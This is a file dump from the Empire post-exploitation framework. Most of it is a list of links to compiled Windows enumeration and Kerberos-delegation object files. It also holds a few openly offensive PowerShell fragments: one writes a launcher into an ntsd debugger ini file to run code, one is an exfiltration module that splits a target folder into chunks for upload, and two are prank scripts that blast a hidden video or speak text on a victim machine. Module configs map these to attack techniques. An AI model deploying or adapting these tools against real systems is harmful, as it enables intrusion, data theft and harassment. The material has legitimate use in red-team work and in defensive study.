--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/list_firewall_rules/list_firewall_rules.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/listdns/listdns.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/listdns/listdns.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/listdns/listdns.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/listdns/listdns.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/listmods/listmods.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/listmods/listmods.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/listmods/listmods.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/listmods/listmods.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/locale/locale.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/locale/locale.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/locale/locale.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/locale/locale.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netgroup/netgroup.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netgroup/netgroup.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netgroup/netgroup.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netgroup/netgroup.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netlocalgroup/netlocalgroup.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netlocalgroup/netlocalgroup.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netlocalgroup/netlocalgroup.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netlocalgroup/netlocalgroup.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netloggedon/netloggedon.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netloggedon/netloggedon.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netloggedon/netloggedon.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netloggedon/netloggedon.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netshares/netshares.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netshares/netshares.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netshares/netshares.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netshares/netshares.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netstat/netstat.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netstat/netstat.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netstat/netstat.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netstat/netstat.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nettime/nettime.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nettime/nettime.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nettime/nettime.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nettime/nettime.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuptime/netuptime.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuptime/netuptime.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuptime/netuptime.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuptime/netuptime.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuse/netuse.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuse/netuse.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuse/netuse.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuse/netuse.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuser/netuser.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuser/netuser.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuser/netuser.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuser/netuser.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuserenum/netuserenum.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuserenum/netuserenum.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netuserenum/netuserenum.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netuserenum/netuserenum.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netview/netview.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netview/netview.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/netview/netview.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/netview/netview.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nonpagedldapsearch/nonpagedldapsearch.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nonpagedldapsearch/nonpagedldapsearch.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nonpagedldapsearch/nonpagedldapsearch.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nonpagedldapsearch/nonpagedldapsearch.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/notepad/notepad.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/notepad/notepad.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/notepad/notepad.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/notepad/notepad.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nslookup/nslookup.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nslookup/nslookup.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/nslookup/nslookup.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/nslookup/nslookup.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/probe/probe.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/probe/probe.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/probe/probe.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/probe/probe.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/reg_query/reg_query.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/reg_query/reg_query.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/reg_query/reg_query.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/reg_query/reg_query.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/resources/resources.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/resources/resources.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/resources/resources.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/resources/resources.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/routeprint/routeprint.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/routeprint/routeprint.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/routeprint/routeprint.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/routeprint/routeprint.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_enum/sc_enum.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_enum/sc_enum.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_enum/sc_enum.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_enum/sc_enum.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qc/sc_qc.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qc/sc_qc.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qc/sc_qc.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qc/sc_qc.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qdescription/sc_qdescription.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qdescription/sc_qdescription.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qdescription/sc_qdescription.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qdescription/sc_qdescription.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qfailure/sc_qfailure.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qfailure/sc_qfailure.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qfailure/sc_qfailure.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qfailure/sc_qfailure.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qtriggerinfo/sc_qtriggerinfo.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qtriggerinfo/sc_qtriggerinfo.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_qtriggerinfo/sc_qtriggerinfo.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_qtriggerinfo/sc_qtriggerinfo.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_query/sc_query.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_query/sc_query.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/sc_query/sc_query.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/sc_query/sc_query.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/schtasksenum/schtasksenum.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/schtasksenum/schtasksenum.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/schtasksenum/schtasksenum.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/schtasksenum/schtasksenum.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/schtasksquery/schtasksquery.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/schtasksquery/schtasksquery.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/schtasksquery/schtasksquery.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/schtasksquery/schtasksquery.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/tasklist/tasklist.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/tasklist/tasklist.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/tasklist/tasklist.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/tasklist/tasklist.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/uptime/uptime.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/uptime/uptime.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/uptime/uptime.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/uptime/uptime.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/vssenum/vssenum.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/vssenum/vssenum.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/vssenum/vssenum.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/vssenum/vssenum.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/whoami/whoami.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/whoami/whoami.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/whoami/whoami.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/whoami/whoami.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/windowlist/windowlist.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/windowlist/windowlist.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/windowlist/windowlist.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/windowlist/windowlist.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/wmi_query/wmi_query.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/wmi_query/wmi_query.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/situational_awareness/wmi_query/wmi_query.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/situational_awareness/wmi_query/wmi_query.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/tgtdelegation/tgtdelegation.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/tgtdelegation/tgtdelegation.x64.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/bof/tgtdelegation/tgtdelegation.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/bof/tgtdelegation/tgtdelegation.x86.o


--------------------------------------------------------------------------------
/empire/server/data/module_source/code_execution/Invoke-Ntsd.ps1:
--------------------------------------------------------------------------------
1 | 
2 | Function Write-Ini([string]$path, [string]$launcher)
3 | {
4 | 	# -Encoding ASCII is needed otherwise it will write in unicode
5 | 	# this will cause ntsd to not execute our code
6 | 	".shell" | Out-File -Encoding ASCII "$path\ntsd.ini"
7 | 	"$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append
8 | }
9 | 


--------------------------------------------------------------------------------
/empire/server/data/module_source/code_execution/ntsd_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/code_execution/ntsd_x64.exe


--------------------------------------------------------------------------------
/empire/server/data/module_source/code_execution/ntsd_x86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/code_execution/ntsd_x86.exe


--------------------------------------------------------------------------------
/empire/server/data/module_source/code_execution/ntsdexts_x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/code_execution/ntsdexts_x64.dll


--------------------------------------------------------------------------------
/empire/server/data/module_source/code_execution/ntsdexts_x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/data/module_source/code_execution/ntsdexts_x86.dll


--------------------------------------------------------------------------------
/empire/server/data/module_source/exfil/Invoke-PostExfil.ps1:
--------------------------------------------------------------------------------
 1 | 
 2 | Invoke-PostExfil {
 3 |   <#
 4 |   .SYNOPSIS
 5 | 
 6 |   Compresses a target folder, breaks it into chunks, and exfils
 7 |   the parts to a web server.
 8 | 
 9 |   .PARAMETER Folder
10 | 
11 |   Folder of files to exfil.
12 | 
13 |   .PARAMETER Server
14 | 
15 |   Server path to exfil to.
16 | 
17 |   #>
18 | 
19 |   function split($inFile,  $outPrefix, [Int32] $bufSize){
20 | 
21 |     $stream = [System.IO.File]::OpenRead($inFile)
22 |     $chunkNum = 1
23 |     $barr = New-Object byte[] $bufSize
24 | 
25 |     while( $bytesRead = $stream.Read($barr,0,$bufsize)){
26 |       $outFile = "$outPrefix$chunkNum"
27 |       $ostream = [System.IO.File]::OpenWrite($outFile)
28 |       $ostream.Write($barr,0,$bytesRead);
29 |       $ostream.close();
30 |       echo "wrote $outFile"
31 |       $chunkNum += 1
32 |     }
33 |   }
34 | }
35 | 
36 | 
37 | 
38 | 
39 | # split file into chunks,
40 | # upload to a specified exfil URI
41 | 


--------------------------------------------------------------------------------
/empire/server/data/module_source/fun/Invoke-Thunderstruck.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-Thunderstruck
 2 | {
 3 |     [CmdletBinding()]
 4 |     Param (
 5 |         [Parameter(Mandatory = $False, Position = 0)]
 6 |         [ValidateNotNullOrEmpty()]
 7 |         [String] $VideoURL = "https://www.youtube.com/watch?v=leJ_wj7mDa0"
 8 |     )
 9 | 
10 |     Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
11 |     Set-Speaker -Volume 50
12 | 
13 |     #Create hidden IE Com Object
14 |     $IEComObject = New-Object -com "InternetExplorer.Application"
15 |     $IEComObject.visible = $False
16 |     $IEComObject.navigate($VideoURL)
17 | 
18 |     Start-Sleep -s 5
19 | 
20 |     $EndTime = (Get-Date).addseconds(90)
21 | 
22 |     # ghetto way to do this but it basically presses volume up to raise volume in a loop for 90 seconds
23 |     do {
24 |        $WscriptObject = New-Object -com wscript.shell
25 |        $WscriptObject.SendKeys([char]175)
26 |     }
27 |     until ((Get-Date) -gt $EndTime)
28 | }
29 | 


--------------------------------------------------------------------------------
/empire/server/data/module_source/fun/Invoke-VoiceTroll.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-VoiceTroll
 2 | {
 3 |     [CmdletBinding()]
 4 |     Param (
 5 |         [Parameter(Mandatory = $True, Position = 0)]
 6 |         [ValidateNotNullOrEmpty()]
 7 |         [String] $VoiceText
 8 |     )
 9 |     Set-StrictMode -version 2
10 |   Add-Type -AssemblyName System.Speech
11 |   $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer
12 |   $synth.Speak($VoiceText)
13 | }
14 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/adcs_enum.yaml:
--------------------------------------------------------------------------------
 1 | name: adcs_enum
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Enumerate CAs and templates in the AD using Win32 functions.
 7 | software: ''
 8 | tactics: [TA0043, TA0007]
 9 | techniques: [T1590.001, T1590.003, T1482, T1106]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/adcs_enum/adcs_enum.x86.o
29 |   x64: bof/situational_awareness/adcs_enum/adcs_enum.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/adcs_enum_com.yaml:
--------------------------------------------------------------------------------
 1 | name: adcs_enum
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
 6 | description: Enumerate CAs and templates in the AD using ICertConfig COM object.
 7 | software: ''
 8 | tactics: [TA0043, TA0007]
 9 | techniques: [T1590.001, T1590.003, T1482, T1559.001]
10 | background: false
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: bof
15 | min_language_version: ''
16 | comments:
17 |   - https://github.com/trustedsec/CS-Situational-Awareness-BOF
18 | options:
19 |   - name: Architecture
20 |     description: Architecture of the beacon_funcs.o to generate with (x64 or x86).
21 |     required: true
22 |     value: x64
23 |     strict: true
24 |     suggested_values:
25 |       - x64
26 |       - x86
27 | bof:
28 |   x86: bof/situational_awareness/adcs_enum_com/adcs_enum_com.x86.o
29 |   x64: bof/situational_awareness/adcs_enum_com/adcs_enum_com.x64.o
30 |   entry_point: ''
31 |   format_string: ''
32 | script_path: ''
33 | script_end: ''
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/bof/situational_awareness/adcs_enum_com2.yaml:
--------------------------------------------------------------------------------
 1 | name: adcs_enum_com2
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: '@Cx01N'
 5 |     link: https://twitter.com/Cx01N_
